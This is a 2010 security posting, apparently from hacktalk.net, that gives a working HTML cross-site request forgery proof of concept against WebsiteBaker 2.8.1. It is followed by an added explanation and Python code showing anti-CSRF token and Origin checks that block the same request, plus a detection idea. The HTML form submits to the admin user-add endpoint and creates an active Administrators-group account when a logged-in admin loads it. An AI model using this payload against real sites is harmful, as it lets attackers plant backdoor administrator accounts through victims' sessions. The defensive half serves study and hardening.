WebsiteBaker 2.8.1 CSRF Proof of Concept
Source: http://hacktalk.net  Author: Santana  Published: 2010-06-21
# Author: Luis Santana
# Software Link: http://www.websitebaker2.org/modules/download_gallery/dlc.php?file=88&id=1269641667
# Version: 2.8.1
# Tested on: All
# Code : http://hacktalk.net/exploits/websitebakercsrfPOC.zip

The full advisory can be found at
http://hacktalk.net/exploits/websitebakerCSRF.txt

Regards,
Luis Santana
Admin - http://hacktalk.net
HackTalk Security

<h1>WebsiteBaker 2.8.1 CSRF Proof of Concept By Luis Santana HackTalk Security</h1>
<form name="user" action="http://demo.opensourcecms.com/websitebaker/admin/users/add.php" method="post" class="">
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="username_fieldname" value="username_08y7h65u" />

<table cellpadding="5" cellspacing="0" border="0" width="100%">
<tr>
<td width="150">Username:</td>
<td class="value_input">
<input type="text" name="username_08y7h65u" maxlength="30" value="" />
</td>
</tr>
<tr>
<td>Password:</td>

<td class="value_input">
<input type="password" name="password" maxlength="30" />
</td>
</tr>
<tr>
<td>Re-type Password:</td>
<td class="value_input">
<input type="password" name="password2" maxlength="30" />
</td>

</tr>
<tr style="display:none;">
<td> </td>
<td style="font-size: 10px;">
Please note: You should only enter values in the above fields if you wish to change this users password
</td>
</tr>
<tr>
<td>Display Name:</td>
<td class="value_input">
<input type="text" name="display_name" maxlength="255" value="" />

</td>
</tr>
<tr>
<td>Email:</td>
<td class="value_input">
<input type="text" name="email" maxlength="255" value="" />
</td>
</tr>
<tr style="">
<td>Home Folder:</td>

<td class="value_input">
<select name="home_folder">
<option value="">None</option>

<option value="/testbild" >/media/testbild</option>
</select>
</td>
</tr>
<tr>

<td>Group:</td>
<td class="value_input">
<select name="groups[]" multiple="multiple" size="5">

<option value="1" >Administrators</option>
</select>
</td>
</tr>
<tr>

<td> </td>
<td>
<input type="radio" name="active[]" id="active" value="1" checked="checked" />
<label for="active">Active</label>
<input type="radio" name="active[]" id="disabled" value="0" />
<label for="disabled">Disabled</label>
</td>
</tr>

<tr>
<td> </td>
<td>
<input type="submit" name="submit" value="Add" />
<input type="reset" name="reset" value="Reset" />
</td>
</tr>
</table>

</form>


<p>Greetz to Shardy, Xires and Stacy, Rage, and n3xus</p>
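The form above works because admin/users/add.php accepts any POST that arrives with the administrator's session cookie: the only per-form value it carries, the randomised username field name, is itself supplied by the client in the hidden `username_fieldname` input, so it is not a request-forgery check. The example below is added here to show the defence the handler lacked; it is not WebsiteBaker code. It models the handler in Python with constructed session, header and form dictionaries, issues a per-session anti-CSRF token that the real form would embed as a hidden field, verifies it with a constant-time compare, and additionally rejects requests whose Origin (or Referer) is not the site's own. `SITE_ORIGIN` is assumed from the PoC's form action; the `csrf_token` field name is an assumption.

```python
"""Anti-CSRF guard for a user-add handler (added example, not WebsiteBaker code).

Session, headers and form are plain dicts standing in for the real request;
SITE_ORIGIN is taken from the PoC form's action URL and assumed to be the
protected site itself.
"""
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://demo.opensourcecms.com"   # assumed: origin of the PoC's target


def issue_token(session: dict) -> str:
    """Create (or reuse) the session's anti-CSRF token.

    The form renderer embeds it as <input type="hidden" name="csrf_token" ...>;
    an attacker's page cannot read the victim's session, so it cannot forge it.
    """
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def same_site(headers: dict) -> bool:
    """Second layer: accept only requests that browsers mark as coming from us.

    Prefers Origin; falls back to the Referer's scheme+host. A request with
    neither header is treated as cross-site (fail closed).
    """
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == SITE_ORIGIN


def handle_add_user(session: dict, headers: dict, form: dict) -> tuple:
    """Guarded equivalent of admin/users/add.php. Returns (HTTP status, message)."""
    if not same_site(headers):
        return 403, "rejected: cross-site request"
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token", "")
    # compare_digest avoids leaking token bytes through timing differences
    if not expected or not hmac.compare_digest(submitted, expected):
        return 403, "rejected: missing or invalid anti-CSRF token"
    # The original handler's work (validate username/password, assign groups)
    # would run only past this point.
    return 200, f"user '{form.get('username', '')}' added"


def replay_poc(session: dict) -> tuple:
    """Submit the fields the PoC form sends, from a foreign page, with the
    victim's session cookie attached. The browser sets Origin to the attacker's
    page (constructed value), and the PoC carries no token."""
    headers = {"Origin": "http://attacker.invalid"}     # constructed
    form = {
        "user_id": "",
        "username_fieldname": "username_08y7h65u",
        "username_08y7h65u": "backdoor",
        "password": "x", "password2": "x",
        "display_name": "", "email": "",
        "home_folder": "", "groups[]": "1", "active[]": "1",
        "submit": "Add",
    }
    return handle_add_user(session, headers, form)


if __name__ == "__main__":
    admin_session = {}
    token = issue_token(admin_session)
    print(handle_add_user(admin_session, {"Origin": SITE_ORIGIN},
                          {"csrf_token": token, "username": "alice"}))
    print(replay_poc(admin_session))
```

Both checks matter on their own: the token stops the forged submission even if a browser sends no Origin header, and the Origin check stops it even on a page whose token handling is buggy. Because the PoC adds a member of group 1 (Administrators), a monitoring rule that alerts on any new administrator account, and on POSTs to admin/users/add.php whose Referer is not the site itself, gives a second line of detection on an unpatched install.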
